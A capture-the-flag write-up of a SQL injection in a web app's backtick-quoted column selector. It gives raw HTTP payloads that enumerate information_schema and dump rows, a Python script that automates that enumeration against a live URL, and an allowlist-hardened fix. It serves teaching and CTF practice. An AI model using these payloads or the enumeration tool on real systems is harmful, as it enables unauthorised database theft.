Tags: web sqli 

Rating:

# ▼▼▼Management (Web:60), 51/484=10.5%▼▼▼
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**

---

```
I've created a new website so you can do all your important management. It includes users, creating things, reading things, and... well, not much else. Maybe there's a flag?
Second instance running at 52.90.229.46:8558

tpctf{san1t1z3_y0ur_1npu7s} is not the correct flag. Look harder ;)
Note: the flag format is flag{}, not the usual tpctf{}

Author: Kevin Higgs

Hint
・Those names seem interesting...

・hint.png
mariaDB[sqli]> SELECT * from users;
+-------------+---+---+---+---+---+---+---+---+---+
| name | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 |
+-------------+---+---+---+---+---+---+---+---+---+
|custom-kevin | | | | | | | | | |
```

-----

### 【Understand the functionality】

・Login function (the username is carried in a `user` cookie)

・Pick a number from 1 to 9 and Create: writes the given value to the database

・Pick a number from 1 to 9 and Read: reads the stored value back from the database

-----

First, register the value `testtest1` under `1`.


```
POST / HTTP/1.1
Host: 52.90.229.46:8558
Content-Type: application/x-www-form-urlencoded
Cookie: user=test
Content-Length: 38

number=1&value=testtest1&action=Create
```

```
HTTP/1.1 200 OK
Host: 52.90.229.46:8558
Connection: close
X-Powered-By: PHP/7.0.22-0ubuntu0.16.04.1
Content-type: text/html; charset=UTF-8

<h1>Welcome to manager!</h1>Hello, test!
Please select your number:
<form method='post'><select name='number'><option value='1'>1</option><option value='2'>2</option><option value='3'>3</option><option value='4'>4</option>
<option value='5'>5</option><option value='6'>6</option><option value='7'>7</option><option value='8'>8</option><option value='9'>9</option></select>

Value (if creating): <input type='text' name='value'></input>

<input type='submit' value='Read' name='action'></input><input type='submit' value='Create' name='action'></input>
```

-----

Next, read the value back from `1`.


```
POST / HTTP/1.1
Host: 52.90.229.46:8558
Content-Type: application/x-www-form-urlencoded
Cookie: user=test
Content-Length: 31

number=1&value=test&action=Read
```

```
HTTP/1.1 200 OK
Host: 52.90.229.46:8558
Connection: close
X-Powered-By: PHP/7.0.22-0ubuntu0.16.04.1
Content-type: text/html; charset=UTF-8

SELECT `1` FROM users WHERE name = 'custom-test';Result: testtest1<h1>Welcome to manager!</h1>Hello, test!
Please select your number:
<form method='post'><select name='number'><option value='1'>1</option><option value='2'>2</option><option value='3'>3</option><option value='4'>4</option>
<option value='5'>5</option><option value='6'>6</option><option value='7'>7</option><option value='8'>8</option><option value='9'>9</option></select>

Value (if creating): <input type='text' name='value'></input>

<input type='submit' value='Read' name='action'></input><input type='submit' value='Create' name='action'></input>
```

The SQL statement below is echoed in the response, and `testtest1` comes back.
```
SELECT `1` FROM users WHERE name = 'custom-test';Result: testtest1
```

Both `Cookie: user` and `number` are inserted into the SQL statement: the cookie value becomes the string literal `'custom-test'`, and the number becomes the backtick-quoted column name `` `1` ``.

-----
### 【Look for the vulnerability】

Single quotes in `Cookie: user` were escaped, so the string literal is not injectable.

`number` is injectable: it is placed between backticks (MariaDB identifier quoting) without any escaping or validation, so a backtick in the input closes the identifier and everything after it is parsed as SQL. Escaping quotes in string values does nothing for an identifier slot.
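To see exactly why the identifier slot is injectable while the escaped cookie is not, here is an added example; it is not the challenge's PHP (which this page never shows) but a Python/sqlite3 stand-in for the query the app echoes, with the writeup's row-extraction payload run against it and a hardened reader beside it. The table contents and the names `make_db`, `read_value_vulnerable`, `read_value_safe`, `safe_rejects` and `demo` are constructed for this example.

```python
import sqlite3

# Constructed stand-in for the challenge's `users` table, in an in-memory SQLite
# database. SQLite accepts MySQL-style backtick identifier quoting and `-- `
# comments, which is all the bypass needs; the real target ran MariaDB.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, `1` TEXT, `2` TEXT, `3` TEXT)")
    conn.executemany(
        "INSERT INTO users (name, `1`) VALUES (?, ?)",
        [("custom-Hi", None), ("custom-kevin", None), ("custom-test", "testtest1")],
    )
    return conn


def read_value_vulnerable(conn, user, number):
    """Mirror of the query the challenge echoes back, built by string concatenation.

    The cookie value is quote-escaped (SQLite doubles single quotes; MariaDB
    backslash-escapes, same effect), so it is not injectable. The `number`
    field is pasted between backticks with no escaping or validation, so a
    backtick in it closes the identifier and the rest is parsed as SQL.
    """
    escaped_user = user.replace("'", "''")
    query = f"SELECT `{number}` FROM users WHERE name = 'custom-{escaped_user}'"
    row = conn.execute(query).fetchone()
    return query, (row[0] if row else None)


ALLOWED_NUMBERS = {str(n) for n in range(1, 10)}


def read_value_safe(conn, user, number):
    """Hardened version: identifiers cannot be bound as parameters, so validate
    the column selector against an allowlist and bind the string value."""
    if number not in ALLOWED_NUMBERS:
        raise ValueError(f"invalid column selector: {number!r}")
    row = conn.execute(
        f"SELECT `{number}` FROM users WHERE name = ?", (f"custom-{user}",)
    ).fetchone()
    return row[0] if row else None


def safe_rejects(conn, number):
    """True if the hardened reader refuses `number`."""
    try:
        read_value_safe(conn, "test", number)
        return False
    except ValueError:
        return True


def demo():
    conn = make_db()
    legit = read_value_vulnerable(conn, "test", "1")[1]
    # The writeup's row-extraction payload: close the identifier, read another
    # row's `name` via a LIMIT offset, comment out the application's own suffix.
    payload = "name` from users limit 1,1-- "
    leaked = read_value_vulnerable(conn, "test", payload)[1]
    # The same idea through the cookie fails, because the quote is escaped.
    via_cookie = read_value_vulnerable(conn, "test' OR 1=1-- ", "1")[1]
    return legit, leaked, via_cookie


if __name__ == "__main__":
    print(demo())  # ('testtest1', 'custom-kevin', None)
```

`read_value_safe` keeps the backtick formatting because there is no placeholder syntax for an identifier; the allowlist is what makes it safe, not the quoting.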

-----
### 【Extract the data】

The hint says the backend is `MariaDB`, so `information_schema` is available.

Go after table names other than `users`.

```
POST / HTTP/1.1
Host: 52.90.229.46:8558
Content-Type: application/x-www-form-urlencoded
Cookie: user=test
Content-Length: 111

number=table_name`+from+information_schema.tables+where+table_schema=database()+limit+0,1--+&value=&action=Read
```

```
HTTP/1.1 200 OK
Host: 52.90.229.46:8558
Connection: close
X-Powered-By: PHP/7.0.22-0ubuntu0.16.04.1
Content-type: text/html; charset=UTF-8

SELECT `table_name` from information_schema.tables where table_schema=database() limit 0,1-- ` FROM users WHERE name = 'custom-test';Result: users<h1>Welcome to manager!</h1>Hello, test!
Please select your number:
<form method='post'><select name='number'><option value='1'>1</option><option value='2'>2</option><option value='3'>3</option><option value='4'>4</option>
<option value='5'>5</option><option value='6'>6</option><option value='7'>7</option><option value='8'>8</option><option value='9'>9</option></select>

Value (if creating): <input type='text' name='value'></input>

<input type='submit' value='Read' name='action'></input><input type='submit' value='Create' name='action'></input>
```

`limit 0,1` ⇒ `Result: users`

`limit 1,1` ⇒ `Result:`

So `users` is the only table in this database. (In the payload, `--+` decodes to `-- `: MariaDB only treats `--` as a comment start when whitespace follows it, and that comment is what swallows the application's own trailing `` ` FROM users WHERE name = 'custom-test'``.)

---

Go after column names other than `name` and `1` to `9`.

```
POST / HTTP/1.1
Host: 52.90.229.46:8558
Content-Type: application/x-www-form-urlencoded
Cookie: user=test
Content-Length: 122

number=column_name`from/**/information_schema.columns/**/where/**/table_name='users'/**/limit/**/0,1--+&value=&action=Read
```


```
HTTP/1.1 200 OK
Host: 52.90.229.46:8558
Connection: close
X-Powered-By: PHP/7.0.22-0ubuntu0.16.04.1
Content-type: text/html; charset=UTF-8

SELECT `column_name`from/**/information_schema.columns/**/where/**/table_name='users'/**/limit/**/0,1-- ` FROM users WHERE name = 'custom-test';Result: name<h1>Welcome to manager!</h1>Hello, test!
Please select your number:
<form method='post'><select name='number'><option value='1'>1</option><option value='2'>2</option><option value='3'>3</option><option value='4'>4</option>
<option value='5'>5</option><option value='6'>6</option><option value='7'>7</option><option value='8'>8</option><option value='9'>9</option></select>

Value (if creating): <input type='text' name='value'></input>

<input type='submit' value='Read' name='action'></input><input type='submit' value='Create' name='action'></input>
```

```
SELECT `column_name`from/**/information_schema.columns/**/where/**/table_name='users'/**/limit/**/0,1-- ` FROM users WHERE name = 'custom-test';Result: name
```

Increase the LIMIT offset one row at a time to pull out every column name.

`/limit/**/0,1` ⇒ `Result: name`

`/limit/**/1,1` ⇒ `Result: 1`

`/limit/**/2,1` ⇒ `Result: 2`

`/limit/**/3,1` ⇒ `Result: 3`

`/limit/**/4,1` ⇒ `Result: 4`

`/limit/**/5,1` ⇒ `Result: 5`

`/limit/**/6,1` ⇒ `Result: 6`

`/limit/**/7,1` ⇒ `Result: 7`

`/limit/**/8,1` ⇒ `Result: 8`

`/limit/**/9,1` ⇒ `Result: 9`

`/limit/**/10,1` ⇒ `Result:`

In the end, the only columns are `name` and `1` to `9`.
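The table walk, the column walk and the `name` walk in the next step are the same loop with a different SELECT head, so here is an added Python example that automates it; it is not part of the original writeup. The names `build_number_payload`, `parse_result`, `walk_limit`, `http_sender` and `fake_sender` are chosen here, and the response layout it parses (`;Result: <value><h1>`) is taken from the responses captured above. The `/**/` in the later requests is only a substitute for spaces; the first request used plain spaces and worked, so this example uses spaces.

```python
import re
import urllib.parse
import urllib.request

# The three SELECT heads used in the writeup. Each starts with the column to
# read, followed by a backtick that closes the application's identifier quoting.
TABLES = "table_name` from information_schema.tables where table_schema=database()"
COLUMNS = "column_name` from information_schema.columns where table_name='users'"
NAMES = "name` from users"


def build_number_payload(select_head, offset):
    """Append a one-row LIMIT window and a trailing `-- ` comment.

    The space after `--` is required: MariaDB only treats `--` as a comment
    start when whitespace follows it, and the comment swallows the app's own
    `` ` FROM users WHERE name = '...'``. urlencode() sends that space as `+`,
    which is the `--+` seen in the captured requests.
    """
    return f"{select_head} limit {offset},1-- "


# Assumed response layout, taken from the captures above:
# "<query>;Result: <value><h1>Welcome to manager!</h1>..."
RESULT_RE = re.compile(r"Result:\s*(.*?)<h1>", re.S)


def parse_result(body):
    """Value after 'Result:', '' for a row past the end, None if no marker."""
    m = RESULT_RE.search(body)
    return m.group(1).strip() if m else None


def walk_limit(send, select_head, max_rows=50):
    """Raise the LIMIT offset one row at a time until an empty Result comes back.

    `send(number_payload)` must return the response body as text.
    """
    rows = []
    for offset in range(max_rows):
        value = parse_result(send(build_number_payload(select_head, offset)))
        if not value:
            break
        rows.append(value)
    return rows


def http_sender(url, user="test"):
    """Send the Read form to a live instance (URL supplied by the caller)."""
    def send(number_payload):
        data = urllib.parse.urlencode(
            {"number": number_payload, "value": "", "action": "Read"}
        ).encode()
        req = urllib.request.Request(url, data=data, headers={"Cookie": f"user={user}"})
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.read().decode("utf-8", "replace")
    return send


def fake_sender(rows_by_head):
    """Constructed offline stand-in for the server: answers each payload from a
    dict of select head -> rows, formatted like the real response body."""
    def send(number_payload):
        head, tail = number_payload.rsplit(" limit ", 1)
        offset = int(tail.split(",", 1)[0])
        rows = rows_by_head.get(head, [])
        value = rows[offset] if offset < len(rows) else ""
        query = f"SELECT `{number_payload}` FROM users WHERE name = 'custom-test'"
        return f"{query};Result: {value}<h1>Welcome to manager!</h1>Hello, test!"
    return send


if __name__ == "__main__":
    # Offline demo against the constructed fake; use http_sender(url) for a live target.
    send = fake_sender({TABLES: ["users"], COLUMNS: ["name"] + [str(i) for i in range(1, 10)]})
    print(walk_limit(send, TABLES), walk_limit(send, COLUMNS))
```

`walk_limit` stops at the first empty `Result:`, which is exactly the manual stopping rule used above (`limit 1,1` for tables, `limit 10,1` for columns); `max_rows` is a guard so a misparsed response cannot loop forever.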

---

Next, go after the values in the `name` column. (If you have seen the hint, you can start straight from this step.)


```
POST / HTTP/1.1
Host: 52.90.229.46:8558
Content-Type: application/x-www-form-urlencoded
Cookie: user=test
Content-Length: 63

number=name`from/**/users/**/limit/**/0,1--+&value=&action=Read
```

```
HTTP/1.1 200 OK
Host: 52.90.229.46:8558
Connection: close
X-Powered-By: PHP/7.0.22-0ubuntu0.16.04.1
Content-type: text/html; charset=UTF-8

SELECT `name`from/**/users/**/limit/**/0,1-- ` FROM users WHERE name = 'custom-test';Result: custom-Hi<h1>Welcome to manager!</h1>Hello, test!
Please select your number:
<form method='post'><select name='number'><option value='1'>1</option><option value='2'>2</option><option value='3'>3</option><option value='4'>4</option>
<option value='5'>5</option><option value='6'>6</option><option value='7'>7</option><option value='8'>8</option><option value='9'>9</option></select>

Value (if creating): <input type='text' name='value'></input>

<input type='submit' value='Read' name='action'></input><input type='submit' value='Create' name='action'></input>
```

`/limit/**/0,1--+` ⇒ `Result: custom-Hi`

`/limit/**/1,1--+` ⇒ `Result: flag{aLW4ys_ESC4PE_3v3rYTH1NG!!!!!}`

`flag{aLW4ys_ESC4PE_3v3rYTH1NG!!!!!}`